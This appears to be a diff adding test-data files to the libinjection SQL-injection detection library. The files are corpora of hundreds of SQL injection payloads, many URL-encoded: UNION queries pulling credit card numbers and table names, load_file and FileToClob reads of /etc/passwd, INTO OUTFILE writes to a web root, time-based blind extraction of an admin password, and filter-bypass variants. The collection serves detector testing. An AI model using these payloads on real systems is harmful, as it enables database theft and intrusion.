-11/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union%23--
|
||||
-1/1/%2A%2A/union%23--
|
||||
1/1/%2A%2A/union%23--
|
||||
-11/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
-1%0D%0A/1/%2A%2A/union%23
|
||||
-1%0D%0A/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
1/1/%2A%2A/union
|
||||
%0D%0A1/1/%2A%2A/union
|
||||
0-%0D%0A1/1/%2A%2A/union
|
||||
0x1-%0D%0A1/1/%2A%2A/union
|
||||
0x1%20-%0D%0A1/1/%2A%2A/union
|
||||
test%27-%0D%0A1/1/%2A%2A/union%20select
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
1-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
0-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
%27select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
%27-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
-1.select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27%23
|
||||
%27%20into%20outfile%20%0D%0A%27/var/www/aa.php%27
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20a%20from%20b
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27union%20select%20
|
||||
%27union%20select
|
||||
%22union%20select
|
||||
1%20union%20select
|
||||
%40a%20union%20select
|
4
libinjection/data/sqli-ibm.txt
Normal file
4
libinjection/data/sqli-ibm.txt
Normal file
|
@ -0,0 +1,4 @@
|
|||
# various things for http://www-01.ibm.com/support/knowledgecenter/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm
|
||||
#
|
||||
UNION ALL SELECT FileToClob("/etc/passwd", "server")::html,0
|
||||
UNION ALL SELECT FileToBlob("/etc/passwd", "server")::html,0
|
20
libinjection/data/sqli-insert_attacks.txt
Normal file
20
libinjection/data/sqli-insert_attacks.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
# solar empire attack
|
||||
# http://www.exploit-db.com/exploits/4078/
|
||||
|
||||
# these use the multiple insert syntax
|
||||
# INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) ....
|
||||
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
|
||||
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
|
||||
# $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)"
|
||||
|
||||
F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# numeric version
|
||||
999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# arg switch
|
||||
F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# arg switch + numeric
|
||||
999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
|
8
libinjection/data/sqli-isc_sans.txt
Normal file
8
libinjection/data/sqli-isc_sans.txt
Normal file
|
@ -0,0 +1,8 @@
|
|||
# http://isc.sans.edu/diary.html?storyid=12127
|
||||
189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip----
|
||||
189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip----
|
||||
189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip----
|
||||
189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip----
|
||||
|
||||
# http://isc.sans.edu/diary.html?storyid=11011
|
||||
999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536--
|
7
libinjection/data/sqli-left.txt
Normal file
7
libinjection/data/sqli-left.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
#
|
||||
# Yong Deng reported 2016-10-20
|
||||
#
|
||||
# Tests that "left" is treated as a function
|
||||
#
|
||||
# http://www.w3resource.com/mysql/string-functions/mysql-left-function.php
|
||||
1'and left(database(),2)>'sa'--+
|
640
libinjection/data/sqli-misc.txt
Normal file
640
libinjection/data/sqli-misc.txt
Normal file
|
@ -0,0 +1,640 @@
|
|||
#
|
||||
# Misc collected attacks from the wild and beyond....
|
||||
#
|
||||
SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29
|
||||
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
|
||||
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
|
||||
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
|
||||
PHPX+AND+1%3D1+AND+XX%3DX
|
||||
PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX
|
||||
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27
|
||||
SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
|
||||
materials'%20and%201=1%20and%20''='
|
||||
materials'%20and%201=2%20and%20''='
|
||||
1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
|
||||
-999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x
|
||||
|
||||
# not sql
|
||||
#5000224%27%20UNION%20user_id%3E0--
|
||||
|
||||
-5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0//
|
||||
|
||||
# not sql
|
||||
#-5000224%27%20UNION%20user_id%3E0--
|
||||
5000224%27%20or%201=1--
|
||||
8+and+1=1--
|
||||
8+order+by+1--
|
||||
8-999.9+union+select+0
|
||||
9-999.9+union+select+0--
|
||||
6334588%00%27%7C%7CSLEEP%283%29%26%26%271
|
||||
6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29
|
||||
6334588%26%26SLEEP%283%29
|
||||
6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271
|
||||
6334588%27%20AND%20SLEEP%283%29%20AND%20%271
|
||||
6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35
|
||||
6444930%20%61%6E%64%20%36%3D%36
|
||||
6444930%27%20%61%6E%64%20%27%36%27%3D%27%35
|
||||
6444930%27%20%61%6E%64%20%27%36%27%3D%27%36
|
||||
FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045
|
||||
1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29
|
||||
1234.5%29+ORDER+BY+1
|
||||
FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29
|
||||
FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596
|
||||
FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29
|
||||
FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29
|
||||
FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29
|
||||
FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29
|
||||
FOO%29+AND+4499%3D8923%23
|
||||
FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29
|
||||
FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571
|
||||
FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350
|
||||
%28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29
|
||||
%28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29
|
||||
FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29
|
||||
%28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29
|
||||
FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B--
|
||||
FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410
|
||||
FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114
|
||||
FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285
|
||||
FOO+WAITFOR+DELAY+%270%3A0%3A5%27--
|
||||
1+order+by+1
|
||||
FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29
|
||||
%28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29
|
||||
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL--
|
||||
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27--
|
||||
-999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29--
|
||||
CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL--
|
||||
1 - ORD('A')
|
||||
TRUE DIV(SELECT ORD(LEFT
|
||||
TRUE DIV(SELECT (ORD(LEFT
|
||||
TRUE DIV(SELECT ((ORD(LEFT
|
||||
1 DIV(SELECT ORD(LEFT
|
||||
1 DIV(SELECT (ORD(LEFT
|
||||
0 UNION SELECT (1),2,3
|
||||
1 AND (SELECT TOP 10 USERNAME FROM USERS);
|
||||
1 AND SELECT 1 FROM T.TRANS_DATE -- 1
|
||||
1 AND (SELECT 1 FROM T.TRANS_DATE -- 1
|
||||
1 GROUP BY 1 HAVING 1 = 1
|
||||
1 GROUP BY 1 HAVING '1' = 1
|
||||
1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1
|
||||
1 AND SELECT TOP 10 USERNAME FROM USERS -- 1
|
||||
1001 union(select userid, ccnumber, '3', '4' from credit_cards)
|
||||
1001 union((select userid, ccnumber, '3', '4' from credit_cards))
|
||||
1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards
|
||||
1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards
|
||||
'6334588?'||SLEEP(3)&&'1
|
||||
1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards)
|
||||
1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/
|
||||
(1001)union select-1,ccnumber,3,4 from credit_cards
|
||||
(1001)union select (1),ccnumber,3,4 from credit_cards
|
||||
(1001)union select @a,ccnumber,3,4 from credit_cards
|
||||
1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards
|
||||
1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards
|
||||
1001-'text' union select 1,ccnumber,3,4 from credit_cards
|
||||
1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards
|
||||
((1001)-1) union select 1,2,3,4 from credit_cards
|
||||
1001'-@a union select 1,2,3,4 from credit_cards-- -
|
||||
'1001'-@a union select 1,2,3,4 from credit_cards
|
||||
((1001)-1) union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(-1)union select 1,2,3,4 from credit_cards
|
||||
## 1001 ----1 union select 1,2,3,4 from credit_cards
|
||||
1001 or 'foo' union select 1,2,3,4 from credit_cards
|
||||
1001 and @a union select 1,2,3,4 from credit_cards
|
||||
1001 like @a-1 union select 1,2,3,4 from credit_cards
|
||||
1001-\N-\N union select 1,2,3,4 from credit_cards
|
||||
(1001-\N-\N) union select 1,2,3,4 from credit_cards
|
||||
(1001-\N)-\N union select 1,2,3,4 from credit_cards
|
||||
1001-\N union select 1,2,3,4 from credit_cards
|
||||
1001-true union select 1,2,3,4 from credit_cards
|
||||
(1001-true) union select 1,2,3,4 from credit_cards
|
||||
(1001-'1') union select 1,2,3,4 from credit_cards
|
||||
(1001-@version) union select 1,2,3,4 from credit_cards
|
||||
1-(1001-true) union select 1,2,3,4 from credit_cards
|
||||
1001-false-false union select 1,2,3,4 from credit_cards
|
||||
1001-false-NULL union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards
|
||||
(1)-'1' union select 1,2,3,4 from credit_cards
|
||||
(1)-@version union select 1,2,3,4 from credit_cards
|
||||
(@version)-@version union select 1,2,3,4 from credit_cards
|
||||
(@version)-1 union select 1,2,3,4 from credit_cards
|
||||
(@version)-'1' union select 1,2,3,4 from credit_cards
|
||||
@version-@version union select 1,2,3,4 from credit_cards
|
||||
@version-1 union select 1,2,3,4 from credit_cards
|
||||
@version-'1' union select 1,2,3,4 from credit_cards
|
||||
('1')-'1' union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(-1-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(@version)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(@version-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-@version)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike('1')union select 1,2,3,4 from credit_cards
|
||||
# vv new variations 2013-04-10 nickg vv
|
||||
1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
|
||||
# http://vagosec.org/2013/04/mysql-implicit-type-conversion/
|
||||
# a'+'b encoded is a%27%2B%27b
|
||||
a%27%2B%27b
|
||||
' OR 1='1
|
||||
|
||||
# new variations
|
||||
X' != 'Y' = 0 = '1
|
||||
X' = 'X' = 0 = '1
|
||||
X' = 'X' = 'X' = 0 = '1
|
||||
X' - 'Y' - 0 = '1
|
||||
|
||||
# part of parameter pollution
|
||||
1) FROM USERS WHERE USERNAME=
|
||||
|
||||
# nest pgsql mssql comments
|
||||
1/* /*/ */ */ or 1=1-
|
||||
1/* /* / */ */ or 1=1-
|
||||
|
||||
# small sqli
|
||||
1--
|
||||
1 --
|
||||
1 --
|
||||
1/*
|
||||
1 /*
|
||||
1 /*
|
||||
1*1--
|
||||
1 * 1--
|
||||
1 * 1 --
|
||||
1*1/*
|
||||
1 * 1/*
|
||||
1 * 1 /*
|
||||
1 * 1 /*
|
||||
@version--
|
||||
@@version--
|
||||
@version --
|
||||
@version /*
|
||||
@version/*
|
||||
|
||||
# thanks @d0znpp
|
||||
(select id from users limit 1,1)
|
||||
(select id-0 from users limit 1,1)
|
||||
# known bypass.. for now!
|
||||
(select id,id,id,id from users limit 1,1)
|
||||
|
||||
# some variations
|
||||
'1' union (select id from users limit 1,1)
|
||||
1 union (select id from users limit 1,1)
|
||||
xxx union (select id from users limit 1,1)
|
||||
@version union (select id from users limit 1,1)
|
||||
|
||||
'1' union (select 1 from users limit 1,1)
|
||||
1 union (select 1 from users limit 1,1)
|
||||
xxx union (select 1 from users limit 1,1)
|
||||
@version union (select 1 from users limit 1,1)
|
||||
|
||||
'1' union (select xxx from users limit 1,1)
|
||||
1 union (select xxx from users limit 1,1)
|
||||
xxx union (select xxx from users limit 1,1)
|
||||
@version union (select xxx from users limit 1,1)
|
||||
|
||||
'1' union (select 's' from users limit 1,1)
|
||||
1 union (select 's' from users limit 1,1)
|
||||
xxx union (select 's' from users limit 1,1)
|
||||
@version union (select 's' from users limit 1,1)
|
||||
|
||||
# thanks @LightOS
|
||||
-1 union(((select table_name from information_schema.tables limit 1,1)))
|
||||
'1' union(((select table_name from information_schema.tables limit 1,1)))
|
||||
@foo union(((select table_name from information_schema.tables limit 1,1)))
|
||||
id union(((select table_name from information_schema.tables limit 1,1)))
|
||||
|
||||
# and again @LightOS
|
||||
test'-1/1/**/union(select table)
|
||||
test'-1 union(select table)
|
||||
test'-@version union (select table)
|
||||
test'-'xyz' union (select table)
|
||||
1- @version union(select table_name from information_schema.tables limit 1,1)
|
||||
1- 'xxx' union(select table_name from information_schema.tables limit 1,1)
|
||||
1- union(select table_name from information_schema.tables limit 1,1)
|
||||
@version - @version union(select table_name from information_schema.tables limit 1,1)
|
||||
@version- 'xxx' union(select table_name from information_schema.tables limit 1,1)
|
||||
@version - 5 union(select table_name from information_schema.tables limit 1,1)
|
||||
|
||||
#
|
||||
1 into outfile 'asd'
|
||||
1 into outfile 'asd'--
|
||||
'1' into outfile 'asd'
|
||||
'1' into outfile 'asd' --
|
||||
@version into outfile 'asd'
|
||||
@version into outfile 'asd' --
|
||||
|
||||
1 into outfile ('asd')
|
||||
'1' into outfile ('asd')
|
||||
@version into outfile ('asd')
|
||||
|
||||
1 into outfile substring('asd', 10, 1)
|
||||
'1' into outfile substring('asd', 10, 1)
|
||||
@version into outfile substring('asd', 10 1)
|
||||
|
||||
1 into outfile (substring('asd', 10, 1))
|
||||
'1' into outfile (substring('asd', 10, 1))
|
||||
@version into outfile (substring('asd', 10 1))
|
||||
|
||||
%28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29
|
||||
union%20%28select+id+from+users+limit+1%2C1%29
|
||||
|
||||
#
|
||||
# This is not valid SQL but designed to force a syntax error
|
||||
# http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere()
|
||||
1%0Aand+current_user=notthere()
|
||||
1%0Aand+current_user=1
|
||||
1%0Aand+current_user=@version
|
||||
1%0Aand+current_user='junk'
|
||||
1%0Aand+current_user=foo
|
||||
|
||||
|
||||
|
||||
1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
@version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
|
||||
-.1a%20union%20%28select+id+from+users+limit+1%2C1%29
|
||||
|
||||
case 1 when 2 then 2 end
|
||||
case sin(1) when 2 then 2 end
|
||||
case '1' when 2 then 2 end
|
||||
case 1 when 's' then 2 end
|
||||
case when 2 then 3 end
|
||||
case when 's' then 3 end
|
||||
case when f(1) then 3 end
|
||||
|
||||
-1 union select table_name asda from information_schema.tables
|
||||
-1 union select table_name "asda" from information_schema.tables
|
||||
-1 union select table_name `asda` from information_schema.tables
|
||||
-1 union select table_name as asda from information_schema.tables
|
||||
-1 union select table_name as "asda" from information_schema.tables
|
||||
-1 union select table_name as `asda` from information_schema.tables
|
||||
|
||||
a'and(select(binary(/*!system_user()*/)))like'reading%25
|
||||
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
'foo' union select @``"", table_name from information_schema.tables
|
||||
@version union select @``"", table_name from information_schema.tables
|
||||
|
||||
select @version foo
|
||||
select @version "foo"
|
||||
select @version foo -- junk
|
||||
select @version "foo" -- junk
|
||||
|
||||
$$pgsql evade$$ union select * from foo
|
||||
$foo$pgsql evade$foo$ union select * from foo
|
||||
|
||||
u&'pgsql evade' union select * from foo
|
||||
U&'pgsql evade' union select * from foo
|
||||
|
||||
U&'pgsql evade' uescape '!' union select * from foo
|
||||
|
||||
_latin1'foo' union select * from foo
|
||||
